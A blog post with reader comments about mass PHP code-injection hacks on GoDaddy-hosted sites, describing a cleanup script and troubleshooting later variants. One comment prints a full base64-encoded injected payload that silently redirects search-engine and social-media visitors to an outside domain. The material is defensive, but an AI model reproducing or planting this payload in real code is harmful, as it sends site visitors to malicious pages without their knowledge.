Godaddy got hacked again this morning (This is what Godaddy has to say about it). Update: and again on May 20. And again on September 18 and September 21.
If you host your blog on Godaddy, you would do well to check your site regularly for any malware, and here is how.
The hack is the same as the previous 4 hacks, affecting thousands of sites: A oneliner malware code is inserted in every single .php file on your site, starting with:
?php /**/ eval(base64_decode("goobledegoob"))
I described before how to cure it, but here is another, slightly more sophisticated way which first lists the infected files, prompts to continue, deletes the oneliner malware in all of your .php files, and lists the cured files. It is inspired by a script written by Andy Stratton in this post.
Running the script, even for a large site, will only take half a minute.
The script will not only work for Godaddy + WordPress, but for any .PHP based site (I used it this morning to cure a Drupal site) on any host.
The script is also a quick way to find out if your site is actually infected. Just run it as described below. If there are no infected files, it will say so and won’t prompt to cure anything.
Here are the right steps to follow:
- Make sure you backup your site, just to make sure. There are many tools to do so, but a “brute force” copy of your entire blog directory to your local computer using an FTP tool like Filezilla, works fine.
- Download this zip file. It contains a file called “fixfiles.php”. Extract it and store it on your computer.
(Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.php) - FTP the “fixfiles.php” file to the root directory of your blog. In GoDaddy, that is the /HTML directory (which also contains index.php, wp-login.php etc..):
GoDaddy Root Directory
If you only want to clean a subdirectory (and its underlying tree), put the file in that the subdirectory, but remember also the command in the next line will have to reflect that.
- Then execute the code with the command:
http://yoursite.com/fixfiles.phpor
http://yoursite.com/subdir/fixfiles.php
if you put the script in a sub directory
- The code will first scan for the malware code in your files, in both the directory it is put, and all underlying directories.
If you get the message:0 Infected Files in ./…then your site is clean.
If any malware is found, the script will list the infected files and prompt you to fix them:
Click on “Fix Files”, Click OK on the prompt to proceed:
The script will scan through all files again, and clean the malware. It will list all files that were cleaned.
- Delete the “fixfiles.php” file from your site after execution.
- If you are using a caching plug-in, don’t forget to CLEAR YOUR CACHE, otherwise the malware will continue to be served to your users, even though you cleaned your .php code.
All of that is “curing” the problem. I have looked everywhere, but am yet to find a way to “avoid” the infection. It looks like the hackers found a loophole in Linux shared hosts (and not just those on Godaddy) in combination with PHP vulnerabilities, which the hosting companies have been unable to identify and/or close.
Until such time, scan your sites regularly, and cure the problem immediately before your visitors get infected.
Picture courtesy Owning Pink
Peter. Flemish, European, aid worker, blogger, expeditioner, sailor, traveller, husband, father, friend, nutcase. Not necessarily in that order. (
{ 36 comments… read them below or add one }
Many thanks for this.
Thankfully I’ve only ever used GoDaddy as a Domain registrar service, and not used their hosting (although I recognize the fact that it’s not just them being infected but that they are a principal target) but this ‘fix’ will be very useful for my readers who have not been so fortunate in their hosting provider decisions.
Hostgator seem to be doing something right though, as their clients have not so far been effected – but maybe they have yet to be targeted!
I contacted my hosting provider in Europe who assures me that they are monitoring the situation closely and learning any security lessons that they find might need addressing.
Hi Clive,
Thanks.. I looked at Hostgator.. Indeed they seem to have been saved from the latest hacks. What was not clear, though, was if their packages include the installation services as Godaddy has where Drupal, Wordpress etc.. can be installed by a click of a button.
I am pretty savvy manipulating Drupal and WP, but am absolutely ignorant at system level, so “auto install” would be a must for me.
Another question: have you ever tried their auto-migrate services where they take an existing site and domain and migrate it to their hosting service for free?
thanks,
Peter
Sorry, leaving an answer to one of my question: It seems hostgator uses Fantastico to install 3rd party applications…
So that leaves the question if anyone ever tried their migration services?
Peter
Thanks! I used your script to temporarily bring my site back to life. I’m also sick to death of GoDaddy. Slow, unstable and now this. If you fancy a GoDaddy rant …
http://jonontech.com/2010/05/18/godaddy-godaddy-you-bastards-im-through/
Glad it helped, Jon!
I am looking for a Godaddy alternative myself… Not too happy about it neither…
Peter
I’ve been happy with Media Temple. I had moved all of my sites over there except for the one that got infected (on godaddy). http://thecompleteself.com
I’m implementing your fix as we speak. If all goes well, you will no longer see a blocked site. next I need to ask Google to recheck the site.
Thanks,
matthew
Thanks for your time and script too. I ran it on two of my gd hosted sites and they were both ok. Would have taken a lot longer to do it manually.
“(Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.txt)”
Do you mean “fixfiles.php”?
Sorry, my mistake… Correct: save it as “fixfilex.php”
Peter
I hope I’ll avoid the attacks now that I’ve left Godaddy and moved all of my Wordpress sites to Hostgator.
My fingers are crossed…
John,
I am seriously contemplating to move too… Did they do the migration for you, or did you move everything yourself?
Peter
Hostgator (basically the same as bluehost) are normally helpful with their live chat tech support. A request to enable shell access (required a scan of photo ID) was sorted within an hour.
However, all my sites were attacked in the same way as listed above, (around May 19th I think) so I don’t think that their security is necessarily better than godaddy’s, using this attack as evidence.
Finally, I’d recommend using their simplescripts service over fantastico, as WP upgrades are made available more quickly, and is a little more flexible.
I ran this test and got this script, am i in the green or is my site infected?
Warning: opendir(./\_db_backups\) [function.opendir]: failed to open dir: No such file or directory in D:\Hosting\4769296\html\fixfiles.php on line 35
0 Infected Files in ./
Hi Aaron:
Apart from this error opening that particular subdirectory, it looks like indeed your site is not infected.
http://yoursite.com/wp_content/fixfiles.php… Know that then, ONLY that subdirectory (and other directories beneath it) will be checked/cured, and not the whole site.P.
They got my site too. A call to Godaddy and they said *I* must have loaded something bad on my site, and they knew NOTHING of it nor were they at fault. They wouldn’t acknowledge any problem after going to my website. This fixed it right up. Thank you so much!!!
You are welcome.
As a hint: when I have a problem which I suspect to be caused by a problem others might also be experiencing, like GoDaddy hosting, I do a quick Twitter search on that subject. There’s a big chance you’re not the first one, if it is a common problem.
E.g. a Twitter search on “Godaddy” last night revealed just how massive the hacking was (again).
With that data at hand, there is no way their support can send you off with a dumb message like they gave you…
PS: On Twitter, @Godaddy was quick to confirm they were being hacked.
I am confused as to what to do. I added the zip to my HTML root directory but how do I do the rest?
Ciao Amanda.
Please follow the instructions step by step.
As per instructions:
- Download the zip file onto your computer.
- It contains a file called “fixfiles.php”. Extract it and store it on your computer.
- Save it as fixfiles.php
- FTP the “fixfiles.php” file to the root directory of your blog.
- in your browser, type the url “http://www.yoursite.com/fixfiles.php
Let me know if you still have problems.
Peter
Here is another nice and quick fix ..
http://alltips.in/how-to-fix-godaddy-malware-attack.html
Great solution, it works on godaddy
you hit me on twitter letting me know how to fix my site
just got hit AGAIN, and looks like this site did too
so heads up
I think GoDaddy is good place to buy and sell domains but most worst place to get hosting service.
Howdy!
just migrated a site from GoDaddy to Hostgator and this little beasty came along for the ride. Your script is SUPER helpful, ta… but one thing to note – the latest mutation features whacking the php code into the first line but NOT using a line break… so your script has not only stripped out the malicious code but the opening php tag on EVERY php script on my Joomla site. Not getting at you about it, as I appreciate the help… just thought you’d like to know so maybe you could adjust your code!
Hi Bren,
Sorry for the trouble.. It seems indeed that the newest virus does not leave that empty line.
Let me see what I can do to adapt the code!
Would it be possible to email me an infected .php file to test?
Peter (at) theroadtothehorizon (dot) org
Thanks a million for this. I got hit by the same type of thing this weekend on a GoDaddy shared server, though they’re moving to a strategy of embedding a single-line Javascript URL forwarder into the first line of _almost_ every file named, “index.php”. The script provided on this page only needed minor tweaks to detect and remove the current strain of attack, thanks a lot for this.
Hi, this fix looks great, this is attacking my sites again now, but I’m not been able to remove the code with your fix. What could I change to make it work? I’m on Hostmonster, not Goddady. Thanks! The code I get now is:
eval(base64_decode(“DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwidHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2siKSkgew0KCWlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Jpbmdvc3RhcnQub3NhLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ==”));
Hi Dave,
I have answered you via Email.. The problem is that indeed the code signature keeps on changing, so also the “fix” code should be adapted…
Hi,
I’ll have to say that your solution is a cure not the prevention.
I myself am a PHP expert and I have seen the script of fixfiles.php. It only searches for “<?php /**/ eval(base64_decode(" in the beginning of the file and if finds, it lists that as a reported file. But there are so many other kind of malware lines which get inserted at the beginning of the file e.g. "” and iframes also get inserted. This script won’t cure them unless we modify the script a little bit for those conditions as well.
One can set this file execution using cron job and run it daily so whenever the site gets attacked, fixfiles script will fix that. But again, it will just be a cure not prevention.
Godaddy is not that cause of it, there are many other sites hosted on other servers like hostgator, bluehost which are facing the same problem.
A simple solution is to re-upload a fresh copy of your script to the server. But still there are situations where this doesn’t help e.g. if the virus is in the database or in a plugin/extension etc.
I am working on it to find the permanent cure, will get back once done.
Thanks,
Umer
@Umer: I fully agree with you on all accounts. It is a cure. And only a cure for the first batch of mass-infections, which happened about a year ago. Since then the infection “signatures” have changed.. Should be easy to change that in the script. If I would be php-programmer, I’d love to make a script that prompts for the signature.
True too that this script only cures infected .php files, for base64-signatures. There are many other ways a site can get infected.
True too, this is curing, and prevention would be better. I covered a couple of those in another post, but none of them is water-tight.
At the time of the first mass infections, the hackers clearly got in via Godaddy, and got hold of FTP login credentials. Changing the credentials helped many. But the leak did not come from the sites themselves, but from the hosting service (e.g. I never use FTP, only SFTP)…
If you ever come up with a more flexible way to cure, and a more watertight way to prevent, i’d be happy to write a post about it. (and you would help many people along the way too!)
best,
Peter
Peter,
I have tried to upload this to the root directory at my GD Wordpress site, via Transmit, and the file never appears, just files that begin with:.pureftpd-upload. followed by a long string of digits. Files that I now cannot delete.
Is this good news, i.e., GD is preventing me from uploading executable php at root?
[edit: sorry got confused on which blogpost this comment was made... thought it was on the post to avoid malware being uploaded via .jpg files... My mistake... so forget what I wrote below.]
Chris,
No, that is not exactly how it works. Some content management systems allow users to upload files e.g. avatars. If a hacker would do that, and know where the file is stored (and hide php code in the uploaded file), and execute it, then he is in.
So you’d have to mimick a user on your site.
To simulate it, though, you can transfer the file to your site using FTP, and then execute it from the directory where you uploaded it.
hope this helps,
Peter
Chris, I will answer via email directly
Hi – I tried it – it says 0 files, but I know that I have the base64 hacks in the files. So I’m not sure why it’s saying none…
Dawn,
The cleanup routine is based on the hacking code “signature” from 2 years ago.
it is looking for any file where the FIRST line starts with:
< ?php /**/ eval(base64_decode(Check the .php files on your server and see which base64 code the hackers have put in your files. IF the hacked files contain a string on the FIRST line of your .PHP file, but it does not match the above search criteria, you need to copy that piece of code and put it into my cleanup routine. Has to be an exact copy.
If your site is hosted by a commercial hosting provider, it might be good to contact their support and ask them to look at your files, and if possible cure them. As we are now 2 years after the first of these hacks came in, most hosting providers have cleanup scripts now... Might be a safier option for you, as in the mean time, hackers have diversified their hack and now inject other code in other places.
If your site was hacked through the timthumb backdoor, you will cure it in yet another way (again, your hosting provider should be able to help you)
Let me know if you need further assistance!
Peter
We actually found that if you’ve got multiple base64 signatures in your code, you need to look for an auto-generation script in your code. Our Joomla code was riddled with base64 and javascript redirection code, and we eventually found the auto-generation script that was embedded in our Joomla code to randomly insert the hacked code in-place. It was an impressive piece of code, I should have kept it around, it did char/ascii translation from a huge string that was ascii encoded (and didn’t throw any red flags).
Good luck.
-Danny
Glad you were able to cure it, Danny.
“When it all started”, i mean this code injection on a massive scale, two years ago, it was simple to cure, as it was just one piece of code injected at the first line of the .php file. You cured that, secured your site (if they did not get in through a backdoor of a shared server itself) and you were done.. But now, this type of hacking got more sophisticated. With the Timthumb backdoor, I saw how the hackers’ script had found one old timthumb script, and must have “tagged” it, as in the weeks to come, they tried to inject one file with a bit of code. Once they did that, again, they must have flagged it “that they got in”, they executed that code, which did a whole series of operations on my site. They actually created an entire subsite (in a /subdirectory), which was a PC virus injector (infected anyone who visited that subsite).
The moment they had that site set up, they sent out a spam email to a massive list of people, directing them to that subsite.
I got to know about it, as someone went to my actual site, found the “contact me” details and emailed me, warning of the infection. I was able to clean it all up in a few hours, but in the mean time, Google had already banned that subsite as malicious (I admit, they were really quick), and at the same time, secured the email spamming-backdoor from my domain.
I think the time, us webmasters, can say “Oh it won’t happen to me”, is over. The hacking attempts are on such a massive scale, and play that close on the ball that the moment a vulnerability is discovered, as of the next days, their servers start searching for sites with that vulnerability already.
Wish us luck, protecting one’s site will only become more and more difficult.
Peter
{ 5 trackbacks }